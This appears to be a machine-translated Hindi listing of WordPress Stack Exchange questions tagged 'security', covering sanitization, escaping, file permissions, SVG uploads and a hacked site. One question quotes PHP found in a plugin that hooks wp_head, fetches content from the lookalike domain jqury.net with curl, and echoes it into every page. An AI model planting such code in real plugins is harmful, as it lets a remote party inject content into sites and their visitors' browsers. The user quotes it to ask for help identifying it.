security पर टैग किए गए जवाब

बन्द है। यह सवाल ऑफ टॉपिक है । यह वर्तमान में उत्तर स्वीकार नहीं कर रहा है। इस प्रश्न को सुधारना चाहते हैं? प्रश्न अपडेट करें तो यह है -विषय पर के लिए वर्डप्रेस विकास स्टैक एक्सचेंज। 4 साल पहले बंद हुआ । मैंने प्लगइन सरल लॉगिन लॉकडाउन स्थापित किया …

20 login  security 

मेरे पास एक ग्राहक था जो हाल ही में हैक हो गया और मैंने देखा कि उसकी साइट पर अजीब चरित्र दिखाई दे रहे थे, जैसे got और got। यह पता चला कि हैकर्स ने wp_optionsडेटाबेस में तालिका में ब्लॉग_चैट को UTF-7 में बदल दिया है । मैंने इसे वापस …

19 security  encoding  hacked  characters 

मैं वर्डप्रेस पर नया हूँ। मैंने हाल ही में एक लेख पढ़ा कि कैसे हैकर्स प्लगइन्स में कमजोरियों का फायदा उठा सकते हैं। Google Pagespeed जैसे विभिन्न स्रोतों ने भी मुझे प्लगइन्स का उपयोग करने से रोका है या कम से कम इसे न्यूनतम रखने के लिए। व्यक्तिगत रूप से, …

19 plugins  security 

मैं वर्तमान में एक प्लगइन विकसित कर रहा हूं और संभावना है कि मैं इसे सार्वजनिक प्लगइन रिपॉजिटरी पर जारी करने की संभावना से अधिक कर दूंगा ताकि अन्य इसका उपयोग कर सकें। प्लगइन एक एपीआई का उपयोग करेगा और इस एपीआई का उपयोग करने के लिए आपको एक उपयोगकर्ता …

19 plugin-development  security  api  encryption 

मुझे यह एक प्लगइन में मिला। यह क्या करता है? यह खतरनाक है? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

17 plugins  wp-admin  security  curl 

मैं यह सुनिश्चित करना चाहता हूं कि मेरे प्लग इन / थीम के सभी डेटा को डेटाबेस में प्रवेश करने से पहले और ब्राउज़र पर आउटपुट होने से पहले सुरक्षित रूप से संभाला जाए। मेरी समस्या यह है कि ऐसी परिस्थितियाँ हैं जहाँ एपीआई आपके लिए सैनिटाइजेशन को संभालता है …

17 plugin-development  security  customization  validation  sanitization 

रखने wp-admin/install.phpऔर wp-admin/install-helper.phpWordPress के नए संस्करणों पर एक सुरक्षा रिसाव है? डिफ़ॉल्ट रूप से उन फाइलों पर अनुमति 644 है। अगर कोई लीक है, तो कृपया किस तरह का?

16 security  installation 

जैसा कि वर्तमान में खड़ा है, यह प्रश्न हमारे प्रश्नोत्तर प्रारूप के लिए एक अच्छा फिट नहीं है। हम तथ्यों, संदर्भों या विशेषज्ञता के आधार पर उत्तर दिए जाने की अपेक्षा करते हैं, लेकिन इस प्रश्न पर बहस, बहस, मतदान या विस्तारित चर्चा की संभावना होगी। यदि आपको लगता है …

16 plugins  plugin-development  security  sql 

मैं देखता हूं कि SVG को मीडिया अपलोडर में डिफ़ॉल्ट रूप से ब्लॉक किया गया है और आपको इसे फ़ंक्शन में एक समर्थित MIME प्रकार के रूप में जोड़ना होगा। इसके पीछे क्या सुरक्षा कारण हैं?

15 media  security  svg 

मैंने कोड को देखा था, लेकिन मैं किसी भी तरह से फंगल पर भागने से नहीं बच पाया, the_title the_content the_excerptजैसे कि मैं इसे सही नहीं पढ़ रहा हूं। क्या मुझे थीम विकास में इन कार्यों से बचने की आवश्यकता है: esc_html ( the_title () ) संपादित करें: जैसा कि …

15 security  escaping 

हम बाहरी डेवलपर के साथ कुछ समस्याएँ हैं। हम wp-adminसाइट तक पहुंच को केवल आंतरिक पहुंच ( वीपीएन के माध्यम से ) तक सीमित करना चाहते हैं । बस इसलिए यह बाहरी उपयोगकर्ताओं द्वारा हमला नहीं किया जाएगा। हम साइट से प्रवेशकों की गणना कर सकते हैं और उन्हें फिश …

14 admin  ajax  security 

बस एक त्वरित प्रश्न है जो सुरक्षा के साथ थोड़ा सा मदद कर सकता है। मैंने देखा कि readme.html फ़ाइल में संस्करण संख्या सूचीबद्ध है। यह प्रत्येक अपग्रेड के बाद फिर से दिखाई देता है और इसलिए licence.txt, और wp-config-sample.php करते हैं। क्या नवीनीकरण के बाद वर्डप्रेस ऑटो इन फ़ाइलों …

13 security  wp-config 

एप्लिकेशन के भीतर अपडेट करने के लिए वर्डप्रेस कॉन्फ़िगर करना (यानी वर्डप्रेस) इसकी सुविधा के कारण मेरे लिए आदर्श है। बहरहाल, मैं आवश्यकताओं से परेशान हूं। अनुरोधित फ़ील्ड जो php के लिए ssh2 को स्थापित करने के बाद दिखाई देते हैं, न केवल मेरी सार्वजनिक कुंजी, बल्कि मेरी निजी कुंजी …

13 security  updates  ssh 

Wp_insert_post () के लिए कोडेक्स को देखते हुए यह कहा गया है कि यह फ़ंक्शन "... चर को पवित्रा करता है, कुछ चेक करता है, जैसे दिनांक / समय, आदि गायब चर में भरता है" (EDIT: मैंने कोडेक्स प्रविष्टि को और अधिक मजबूत उदाहरण शामिल करने के लिए अद्यतन किया …

13 security  sanitization 

यह बात मेरे कोडिंग को मुश्किल बनाती है। वर्डप्रेस कोडेक्स सुरक्षा के बारे में अस्पष्ट बात करके esc_url के उपयोग का कारण बनता है। लेकिन क्या यह वास्तव में परेशानी के लायक है? उदाहरण के लिए, महत्वपूर्ण, व्यावहारिक सुरक्षा लाभ क्या है <?php echo esc_url( home_url( '/' ) ); ?> …

12 security